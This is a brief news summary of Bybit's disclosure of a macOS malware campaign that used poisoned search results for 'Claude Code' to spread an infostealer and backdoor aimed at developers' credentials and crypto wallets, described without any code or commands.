Bybit’s Security Operations Center disclosed a sophisticated, multi-stage macOS malware campaign that poisoned search results for `Claude Code` and other AI development queries. Attackers used SEO poisoning to push a spoofed installation page, delivering a `Mach-O` dropper that executed an `osascript`-based infostealer and harvested **browser credentials**, **macOS Keychain** entries, **Telegram sessions**, **VPN profiles**, and crypto wallet data. The campaign pivoted to a C++ backdoor with sandbox detection, encrypted runtime configs, persistent system agents, and HTTP-based remote control. Bybit identified targeted access attempts against **250+** browser wallet extensions and desktop wallets. Bybit also used AI-assisted analysis to accelerate triage, reverse engineering, and behavioral classification, reducing investigation time from hours to minutes. The disclosure is one of the first from a centralized crypto exchange highlighting developer-focused SEO poisoning tied to AI tool discovery.
Bybit Uncovers AI-Assisted macOS Malware Targeting Developers
Related articles